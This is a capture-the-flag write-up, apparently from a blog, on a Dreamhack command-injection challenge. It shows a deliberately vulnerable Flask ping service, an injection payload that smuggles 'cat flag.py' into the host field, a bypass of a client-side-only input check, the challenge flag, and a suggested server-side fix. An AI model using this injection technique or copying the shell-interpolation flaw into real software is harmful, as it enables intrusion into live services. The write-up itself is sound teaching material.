command-injection-1
- Level: 1
- Link: https://dreamhack.io/wargame/challenges/44/
Description
A service that sends ping packets to a specific Host.
Acquire the flag through Command Injection. The flag is located in flag.py.
Attached
```python
#!/usr/bin/env python3
import subprocess

from flask import Flask, request, render_template, redirect
from flag import FLAG

APP = Flask(__name__)


@APP.route('/')
def index():
    return render_template('index.html')


@APP.route('/ping', methods=['GET', 'POST'])
def ping():
    if request.method == 'POST':
        # User-controlled value, taken from the form with no server-side check
        host = request.form.get('host')
        # Interpolated into a shell command line: this is the injection point
        cmd = f'ping -c 3 "{host}"'
        try:
            output = subprocess.check_output(['/bin/sh', '-c', cmd], timeout=5)
            return render_template('ping_result.html', data=output.decode('utf-8'))
        except subprocess.TimeoutExpired:
            return render_template('ping_result.html', data='Timeout !')
        except subprocess.CalledProcessError:
            return render_template('ping_result.html', data=f'an error occurred while executing the command. -> {cmd}')

    return render_template('ping.html')


if __name__ == '__main__':
    APP.run(host='0.0.0.0', port=8000)
```
Analysis
When it receives a request, the server puts the host form field into the following command without checking it, then runs the command with /bin/sh -c:
```
ping -c 3 "{host}"
```
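This is a command injection: host sits inside double quotes, so an input that closes the first quote and opens a new one makes the shell run a second command. It can be easily solved by
```
"; cat "flag.py
```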
But it did not work! The page kept saying
```
Please match the requested format.
```
Check the source code of ping.html (with the browser's inspect tool):
```html
<h1>Let's ping your host</h1><br/>
<form method="POST">
  <div class="row">
    <div class="col-md-6 form-group">
      <label for="Host">Host</label>
      <input type="text" class="form-control" id="Host" placeholder="8.8.8.8" name="host" pattern="[A-Za-z0-9.]{5,20}" required>
    </div>
  </div>
  <button type="submit" class="btn btn-default">Ping!</button>
</form>
```
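This is the regex:
```html
<input pattern="[A-Za-z0-9.]{5,20}" required>
```
(Check regex101.com to understand the regex.) It only accepts 5 to 20 characters made of letters, digits and dots, so the quotes, semicolon and space in the payload are refused by the browser.
So we need to get around it. Fortunately, the check exists only on the client side!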
Solution
Use the inspect tool to delete the regex check (the pattern attribute) shown above, then submit the payload:
```
"; cat "flag.py
```
The flag is
```
DH{pingpingppppppppping!!}
```
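The server-side fix that the analysis above points to, as an added example that is not part of the challenge source or the original post: validate host on the server and pass ping an argument list instead of a /bin/sh -c string. The names validate_host, build_ping_argv and safe_ping are hypothetical, and the hostname rule assumes only IP addresses and DNS names are valid targets.

```python
import ipaddress
import re
import subprocess

# Server-side replacement for the pattern= rule that ping.html enforced only
# in the browser (assumption: valid targets are IP addresses or DNS names).
HOSTNAME_RE = re.compile(
    r"(?=.{1,253}\Z)(?!-)[A-Za-z0-9-]{1,63}(?<!-)"
    r"(\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*\Z"
)


def validate_host(host):
    """Return a normalized host string, or raise ValueError."""
    if not isinstance(host, str):
        raise ValueError("host is required")
    try:
        return str(ipaddress.ip_address(host))
    except ValueError:
        pass
    if HOSTNAME_RE.match(host):
        return host
    raise ValueError("host is not an IP address or hostname")


def build_ping_argv(host):
    # An argv list means no shell runs, so quotes and ';' are plain bytes.
    # '--' ends option parsing, so the value cannot be read as a ping flag.
    return ["ping", "-c", "3", "--", validate_host(host)]


def safe_ping(host, timeout=5):
    """Hypothetical replacement for the POST branch of ping()."""
    try:
        argv = build_ping_argv(host)
    except ValueError as exc:
        return f"rejected: {exc}"
    try:
        out = subprocess.check_output(argv, timeout=timeout)
        return out.decode("utf-8", errors="replace")
    except subprocess.TimeoutExpired:
        return "Timeout !"
    except (subprocess.CalledProcessError, OSError):
        # Unlike the original handler, do not echo the command back.
        return "an error occurred while executing the command."
```

Either control alone stops this payload; keeping both means a later change to the validation rule does not reopen the shell.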
This post is licensed under CC BY 4.0 by the author.